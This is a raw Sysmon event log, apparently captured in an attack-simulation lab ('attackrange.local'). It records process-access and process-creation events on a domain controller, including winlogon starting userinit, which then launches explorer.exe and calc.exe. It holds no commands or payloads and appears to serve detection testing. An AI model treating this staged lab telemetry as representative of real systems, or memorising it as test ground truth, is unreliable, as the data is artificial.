09:21:44.217{5EBD8912-8CC0-6151-1600-00000000FD01}12961784C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+48674|C:\Windows\System32\RPCRT4.dll+31850|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055209Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:43.998{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000980875Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:45.634{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC28F1B3507ABB73A7F79CC175869978,SHA256=891BEBE00C1038F1D5D0D0952D2BFEE7CC8F19C52038A07C1F48005C539AFC8A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055596Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.811{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055595Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.811{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055594Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.811{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055593Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.811{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055592Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.811{5EBD8912-8D26-6151-8500-00000000FD01}27602120C:\Windows\system32\csrss.exe{5EBD8912-8D29-6151-9400-00000000FD01}4564C:\Windows\System32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055591Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.811{5EBD8912-8D29-6151-9200-00000000FD01}45164520C:\Windows\system32\userinit.exe{5EBD8912-8D29-6151-9400-00000000FD01}4564C:\Windows\System32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\userinit.exe+1cd8|C:\Windows\system32\userinit.exe+26f6|C:\Windows\system32\userinit.exe+30fd|C:\Windows\system32\userinit.exe+3755|C:\Windows\system32\userinit.exe+4553|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055590Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.816{5EBD8912-8D29-6151-9400-00000000FD01}4564C:\Windows\System32\calc.exe10.0.14393.4169 (rs1_release.210107-1130)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationCALC.EXEC:\Windows\System32\calc.exeC:\Windows\system32\ATTACKRANGE\Administrator{5EBD8912-8D28-6151-085E-080000000000}0x85e082HighMD5=2A5CC198FEFC04C2B6B95207A91D3668,SHA256=04FA16D1FBB5F047E7BF9756E8DDC1365AFEAAB22DD4A2C3F03E067B75BED8EA,IMPHASH=3843C3D4A5A7D1045ABE9A4BFCFAAB28{5EBD8912-8D29-6151-9200-00000000FD01}4516C:\Windows\System32\userinit.exeC:\Windows\system32\userinit.exe 10341000x80000000000000001055589Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.811{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055588Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.811{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055587Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.796{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055586Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.796{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055585Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.796{5EBD8912-8D26-6151-8500-00000000FD01}27602120C:\Windows\system32\csrss.exe{5EBD8912-8D29-6151-9300-00000000FD01}4552C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055584Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.796{5EBD8912-8D29-6151-9200-00000000FD01}45164520C:\Windows\system32\userinit.exe{5EBD8912-8D29-6151-9300-00000000FD01}4552C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\userinit.exe+1cd8|C:\Windows\system32\userinit.exe+23e5|C:\Windows\system32\userinit.exe+346e|C:\Windows\system32\userinit.exe+3725|C:\Windows\system32\userinit.exe+4553|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055583Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.753{5EBD8912-8D29-6151-9300-00000000FD01}4552C:\Windows\explorer.exe10.0.14393.4169 (rs1_release.210107-1130)Windows ExplorerMicrosoft® Windows® Operating SystemMicrosoft CorporationEXPLORER.EXEC:\Windows\Explorer.EXEC:\Windows\system32\ATTACKRANGE\Administrator{5EBD8912-8D28-6151-085E-080000000000}0x85e082HighMD5=F7FDECA990692D53D7E4E396B0BD711E,SHA256=1F955612E7DB9BB037751A89DAE78DFAF03D7C1BCC62DF2EF019F6CFE6D1BBA7,IMPHASH=8D2880102609AA4B23679BD4FEBEBC95{5EBD8912-8D29-6151-9200-00000000FD01}4516C:\Windows\System32\userinit.exeC:\Windows\system32\userinit.exe 23542300x80000000000000001055582Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.780{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F229A4B0288ABAF2AA721DA12A069F90,SHA256=0424360CE3365065702DFFE97EB03664F36104402048B9A14A885FEE30E2C1E3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055581Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.733{5EBD8912-8CC0-6151-1600-00000000FD01}12961944C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-9200-00000000FD01}4516C:\Windows\system32\userinit.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055580Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.733{5EBD8912-8CC0-6151-1600-00000000FD01}12961336C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-9200-00000000FD01}4516C:\Windows\system32\userinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055579Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.718{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055578Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.718{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055577Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.718{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055576Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.718{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055575Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.718{5EBD8912-8D26-6151-8500-00000000FD01}27602120C:\Windows\system32\csrss.exe{5EBD8912-8D29-6151-9200-00000000FD01}4516C:\Windows\system32\userinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055574Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.718{5EBD8912-8D26-6151-8600-00000000FD01}12882316C:\Windows\system32\winlogon.exe{5EBD8912-8D29-6151-9200-00000000FD01}4516C:\Windows\system32\userinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+15b13|C:\Windows\system32\winlogon.exe+ea76|C:\Windows\system32\winlogon.exe+b12f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055573Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.720{5EBD8912-8D29-6151-9200-00000000FD01}4516C:\Windows\System32\userinit.exe10.0.14393.0 (rs1_release.160715-1616)Userinit Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationUSERINIT.EXEC:\Windows\system32\userinit.exeC:\Windows\system32\ATTACKRANGE\Administrator{5EBD8912-8D28-6151-085E-080000000000}0x85e082HighMD5=C1B1FFC800BE2F31EB2CF8CB40629C69,SHA256=CFC6A18FC8FE7447ECD491345A32F0F10208F114B70A0E9D1CD72F6070D5B36F,IMPHASH=BFA137B16F3492AFCA0551687B067C04{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\System32\winlogon.exewinlogon.exe 10341000x80000000000000001055572Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.702{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055571Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.608{5EBD8912-8CC0-6151-1200-00000000FD01}4841104C:\Windows\System32\svchost.exe{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+4609|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055570Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.608{5EBD8912-8CC0-6151-1200-00000000FD01}4841104C:\Windows\System32\svchost.exe{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+2e77|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055569Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 